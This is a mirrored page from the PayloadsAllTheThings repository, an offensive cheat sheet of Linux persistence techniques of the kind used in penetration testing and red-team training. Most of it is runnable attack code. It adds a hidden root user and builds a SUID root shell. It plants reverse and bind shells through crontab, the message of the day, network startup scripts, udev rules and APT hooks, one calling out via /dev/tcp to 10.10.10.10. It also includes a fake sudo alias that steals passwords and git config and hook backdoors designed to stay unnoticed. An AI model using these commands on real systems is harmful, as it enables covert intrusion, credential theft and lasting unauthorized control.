mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-23 03:38:50 +00:00
238 lines
9.2 KiB
Markdown
238 lines
9.2 KiB
Markdown
# Linux - Persistence
|
|
|
|
## Summary
|
|
|
|
* [Basic reverse shell](#basic-reverse-shell)
|
|
* [Add a root user](#add-a-root-user)
|
|
* [Suid Binary](#suid-binary)
|
|
* [Crontab - Reverse shell](#crontab---reverse-shell)
|
|
* [Backdooring a user's bash_rc](#backdooring-a-users-bash_rc)
|
|
* [Backdooring a startup service](#backdooring-a-startup-service)
|
|
* [Backdooring a user startup file](#backdooring-a-user-startup-file)
|
|
* [Backdooring Message of the Day](#backdooring-message-of-the-day)
|
|
* [Backdooring a driver](#backdooring-a-driver)
|
|
* [Backdooring the APT](#backdooring-the-apt)
|
|
* [Backdooring the SSH](#backdooring-the-ssh)
|
|
* [Backdooring Git](#backdooring-git)
|
|
* [Additional Linux Persistence Options](#additional-persistence-options)
|
|
* [References](#references)
|
|
|
|
|
|
## Basic reverse shell
|
|
|
|
```bash
|
|
ncat --udp -lvp 4242
|
|
ncat --sctp -lvp 4242
|
|
ncat --tcp -lvp 4242
|
|
```
|
|
|
|
## Add a root user
|
|
|
|
```powershell
|
|
sudo useradd -ou 0 -g 0 john
|
|
sudo passwd john
|
|
echo "linuxpassword" | passwd --stdin john
|
|
```
|
|
|
|
## Suid Binary
|
|
|
|
```powershell
|
|
TMPDIR2="/var/tmp"
|
|
echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c
|
|
gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null
|
|
rm $TMPDIR2/croissant.c
|
|
chown root:root $TMPDIR2/croissant
|
|
chmod 4777 $TMPDIR2/croissant
|
|
```
|
|
|
|
## Crontab - Reverse shell
|
|
|
|
```bash
|
|
(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null
|
|
```
|
|
|
|
## Backdooring a user's bash_rc
|
|
|
|
(FR/EN Version)
|
|
|
|
```bash
|
|
TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
|
|
cat << EOF > /tmp/$TMPNAME2
|
|
alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;if [ \$locale = "fr" ]; then echo -n "[sudo] Mot de passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null && /usr/bin/sudo -S '
|
|
EOF
|
|
if [ -f ~/.bashrc ]; then
|
|
cat /tmp/$TMPNAME2 >> ~/.bashrc
|
|
fi
|
|
if [ -f ~/.zshrc ]; then
|
|
cat /tmp/$TMPNAME2 >> ~/.zshrc
|
|
fi
|
|
rm /tmp/$TMPNAME2
|
|
```
|
|
|
|
or add the following line inside its .bashrc file.
|
|
|
|
```powershell
|
|
$ chmod u+x ~/.hidden/fakesudo
|
|
$ echo "alias sudo=~/.hidden/fakesudo" >> ~/.bashrc
|
|
```
|
|
|
|
and create the `fakesudo` script.
|
|
|
|
```powershell
|
|
read -sp "[sudo] password for $USER: " sudopass
|
|
echo ""
|
|
sleep 2
|
|
echo "Sorry, try again."
|
|
echo $sudopass >> /tmp/pass.txt
|
|
|
|
/usr/bin/sudo $@
|
|
```
|
|
|
|
|
|
## Backdooring a startup service
|
|
|
|
* Edit `/etc/network/if-up.d/upstart` file
|
|
```bash
|
|
RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
|
|
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
|
|
```
|
|
|
|
|
|
## Backdooring Message of the Day
|
|
|
|
* Edit `/etc/update-motd.d/00-header` file
|
|
```bash
|
|
echo 'bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"' >> /etc/update-motd.d/00-header
|
|
```
|
|
|
|
|
|
## Backdooring a user startup file
|
|
|
|
Linux, write a file in `~/.config/autostart/NAME_OF_FILE.desktop`
|
|
|
|
```powershell
|
|
In : ~/.config/autostart/*.desktop
|
|
|
|
[Desktop Entry]
|
|
Type=Application
|
|
Name=Welcome
|
|
Exec=/var/lib/gnome-welcome-tour
|
|
AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide
|
|
OnlyShowIn=GNOME;
|
|
X-GNOME-Autostart-enabled=false
|
|
```
|
|
|
|
## Backdooring a driver
|
|
|
|
```bash
|
|
echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null
|
|
```
|
|
|
|
## Backdooring the APT
|
|
|
|
If you can create a file on the apt.conf.d directory with: `APT::Update::Pre-Invoke {"CMD"};`
|
|
Next time "apt-get update" is done, your CMD will be executed!
|
|
|
|
```bash
|
|
echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor
|
|
```
|
|
|
|
## Backdooring the SSH
|
|
|
|
Add an ssh key into the `~/.ssh` folder.
|
|
|
|
1. `ssh-keygen`
|
|
2. write the content of `~/.ssh/id_rsa.pub` into `~/.ssh/authorized_keys`
|
|
3. set the right permission, 700 for ~/.ssh and 600 for authorized_keys
|
|
|
|
## Backdooring Git
|
|
|
|
Backdooring git can be a useful way to obtain persistence without the need for root access.
|
|
Special care must be taken to ensure that the backdoor commands create no output, otherwise the persistence is trivial to notice.
|
|
|
|
### Git Configs
|
|
|
|
There are multiple [git config variables](https://git-scm.com/docs/git-config) that execute arbitrary commands when certain actions are taken.
|
|
As an added bonus, git configs can be specified multiple ways leading to additional backdoor opportunities.
|
|
Configs can be set at the user level (`~/.gitconfig`), at the repository level (`path/to/repo/.git/config`), and sometimes via environment variables.
|
|
|
|
`core.editor` is executed whenever git needs to provide the user with an editor (e.g. `git rebase -i`, `git commit --amend`).
|
|
The equivalent environment variable is `GIT_EDITOR`.
|
|
|
|
```properties
|
|
[core]
|
|
editor = nohup BACKDOOR >/dev/null 2>&1 & ${VISUAL:-${EDITOR:-emacs}}
|
|
```
|
|
|
|
`core.pager` is executed whenever git needs to potentially large amounts of data (e.g. `git diff`, `git log`, `git show`).
|
|
The equivalent environment variable is `GIT_PAGER`.
|
|
|
|
```properties
|
|
[core]
|
|
pager = nohup BACKDOOR >/dev/null 2>&1 & ${PAGER:-less}
|
|
```
|
|
|
|
`core.sshCommand` is executed whenever git needs to interact with a remote *ssh* repository (e.g. `git fetch`, `git pull`, `git push`).
|
|
The equivalent environment variable is `GIT_SSH` or `GIT_SSH_COMMAND`.
|
|
|
|
```properties
|
|
[core]
|
|
sshCommand = nohup BACKDOOR >/dev/null 2>&1 & ssh
|
|
[ssh]
|
|
variant = ssh
|
|
```
|
|
|
|
Note that `ssh.variant` (`GIT_SSH_VARIANT`) is technically optional, but without it git will run `sshCommand` _twice_ in rapid succession. (The first run is to determine the SSH variant and the second to pass it the correct parameters.)
|
|
|
|
### Git Hooks
|
|
|
|
[Git hooks](https://git-scm.com/docs/githooks) are programs you can place in a hooks directory to trigger actions at certain points during git's execution.
|
|
By default, hooks are stored in a repository's `.git/hooks` directory and are run when their name matches the current git action and the hook is marked as executable (i.e. `chmod +x`).
|
|
Potentially useful hook scripts to backdoor:
|
|
|
|
- `pre-commit` is run just before `git commit` is executed.
|
|
- `pre-push` is run just before `git push` is executed.
|
|
- `post-checkout` is run just after `git checkout` is executed.
|
|
- `post-merge` is run after `git merge` or after `git pull` applies new changes.
|
|
|
|
In addition to spawning a backdoor, some of the above hooks can be used to sneak malicious changes into a repo without the user noticing.
|
|
|
|
Lastly, it is possible to globally backdoor _all_ of a user's git hooks by setting the `core.hooksPath` git config variable to a common directory in the user-level git config file (`~/.gitconfig`). Note that this approach will break any existing repository-specific git hooks.
|
|
|
|
|
|
## Additional Persistence Options
|
|
|
|
* [SSH Authorized Keys](https://attack.mitre.org/techniques/T1098/004)
|
|
* [Compromise Client Software Binary](https://attack.mitre.org/techniques/T1554)
|
|
* [Create Account](https://attack.mitre.org/techniques/T1136/)
|
|
* [Create Account: Local Account](https://attack.mitre.org/techniques/T1136/001/)
|
|
* [Create or Modify System Process](https://attack.mitre.org/techniques/T1543/)
|
|
* [Create or Modify System Process: Systemd Service](https://attack.mitre.org/techniques/T1543/002/)
|
|
* [Event Triggered Execution: Trap](https://attack.mitre.org/techniques/T1546/005/)
|
|
* [Event Triggered Execution](https://attack.mitre.org/techniques/T1546/)
|
|
* [Event Triggered Execution: .bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004/)
|
|
* [External Remote Services](https://attack.mitre.org/techniques/T1133/)
|
|
* [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574/)
|
|
* [Hijack Execution Flow: LD_PRELOAD](https://attack.mitre.org/techniques/T1574/006/)
|
|
* [Pre-OS Boot](https://attack.mitre.org/techniques/T1542/)
|
|
* [Pre-OS Boot: Bootkit](https://attack.mitre.org/techniques/T1542/003/)
|
|
* [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053/)
|
|
* [Scheduled Task/Job: At (Linux)](https://attack.mitre.org/techniques/T1053/001/)
|
|
* [Scheduled Task/Job: Cron](https://attack.mitre.org/techniques/T1053/003/)
|
|
* [Server Software Component](https://attack.mitre.org/techniques/T1505/)
|
|
* [Server Software Component: SQL Stored Procedures](https://attack.mitre.org/techniques/T1505/001/)
|
|
* [Server Software Component: Transport Agent](https://attack.mitre.org/techniques/T1505/002/)
|
|
* [Server Software Component: Web Shell](https://attack.mitre.org/techniques/T1505/003/)
|
|
* [Traffic Signaling](https://attack.mitre.org/techniques/T1205/)
|
|
* [Traffic Signaling: Port Knocking](https://attack.mitre.org/techniques/T1205/001/)
|
|
* [Valid Accounts: Default Accounts](https://attack.mitre.org/techniques/T1078/001/)
|
|
* [Valid Accounts: Domain Accounts 2](https://attack.mitre.org/techniques/T1078/002/)
|
|
|
|
## References
|
|
|
|
* [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289)
|
|
* [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/)
|
|
* [http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html](http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html)
|
|
* [http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/](http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/)
|
|
* [Pouki from JDI](#no_source_code)
|